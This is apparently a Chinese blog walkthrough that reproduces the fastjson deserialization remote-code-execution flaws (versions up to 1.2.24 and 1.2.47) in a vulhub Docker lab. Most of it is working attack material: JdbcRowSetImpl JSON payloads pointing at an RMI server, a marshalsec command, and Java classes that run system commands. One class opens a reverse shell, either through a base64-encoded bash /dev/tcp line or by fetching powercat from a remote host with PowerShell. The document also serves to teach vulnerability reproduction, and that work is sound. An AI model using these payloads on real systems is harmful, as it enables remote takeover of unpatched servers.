前言
這里將fastjson<=1.2.24和fastjson<=1.2.47的版本同時復現。利用的思路都是大致相同的,部分細節忽略。
一、環境搭建和知識儲備
1.1、影響版本
漏洞1
CVE-2017-18349
fastjson <= 1.2.24(實際[1.2.22-1.2.24])
漏洞2
fastjson <= 1.2.47(實際[1.2.25-1.2.47])
1.2、Docker搭建環境
1.進入vulhub/fastjson,啟動docker即可
cd /root/vulhub/fastjson/1.2.24-rce/
docker-compose up -d
2.查看啟動的docker進程
docker ps
3.以上僅展示fastjson<1.2.24的版本,另外一個在vulhub中環境搭建相同,不闡述。
二、復現過程
2.1、fastjson1.2.24
1、整體思路
首先探測數據包的正常返回-->
利用漏洞poc驗證存在與否-->
利用漏洞exp反彈shell或執行命令
2、具體流程
1)、正常數據包返回
我們在這個vulhub的docker環境中搭建出fastjson的服務后,查看docker對外映射的端口,在外部通過瀏覽器以http://ip:port的形式訪問即可,然后會返回圖中的json數據。同時我們也可以通過圖中的post方式傳遞並更改
數據,如圖
2)、在個人的vps或存在可以由docker可以訪問到的ip(后面統稱vps)下建立啟動web服務
假如vps上存在python環境,也可以這樣建立web服務,端口可變,當前目錄即為web根目錄
python3 -m http.server 8888
3)、在web根目錄下建立如下的java文件並編譯
Exploit.java
其中的dnslog.cn的地址需要更改
public class Exploit{
public Exploit() {}
static
{
try {
String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
? new String[]{"cmd.exe","/c", "ping 8twpbw.dnslog.cn"}
: new String[]{"/bin/bash","-c", "curl 8twpbw.dnslog.cn"};
Runtime.getRuntime().exec(cmds);
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Exploit e = new Exploit();
}
}
編譯命令
測試時使用的是jdk1.8
javac Exploit.java
4)、利用vps建立一個RMI服務,目錄不做要求
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://111.111.11.11/#Exploit" 8889
執行命令后如圖
5)、向靶機即docker環境發送如下數據包,即可在dns收到請求
dnslog地址是我們在Explot.java文件中填入的地址,發送的數據在下面的payload
6)、該版本的payload,實際上是這個漏洞復現中最有價值的東西
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://11.11.17.11:8889/Exploit",
"autoCommit":true
}
}
7)、反彈shell,反彈shell需要更改Exploit.java文件執行的命令
注意,其中的ip和port我已經更改,比如其中利用powershell反彈shell需要請求的powercat文件是在我的vps服務器下的,然后linux反彈shell的base64編碼對應的ip和port同樣需要更改
public class Rshell{
public Rshell() {}
static
{
try {
String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
? new String[]{"cmd.exe","/c", "powershell \"IEX (New-Object System.Net.Webclient).DownloadString('http://11.11.11.11/powercat.ps1'); powercat -c 11.11.11.11 -p 9999 -e powershell\""}
: new String[]{"/bin/bash","-c", "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMS4xMS4xMS4xMS85OTk5IDA+JjEK}|{base64,-d}|{bash,-i}"};
Runtime.getRuntime().exec(cmds);
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Rshell e = new Rshell();
}
}
8)、彈回來的shell如圖
2.2、fastjson1.2.47
1、整體思路
首先探測數據包的正常返回-->
利用漏洞poc驗證存在與否-->
利用漏洞exp反彈shell或執行命令
2、具體流程
1)、前置流程和1.2.24的相同,這里直接上payload,用dnslog驗證
2)、payload
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://11.11.17.11:8889/Exploit",
"autoCommit":true
}
}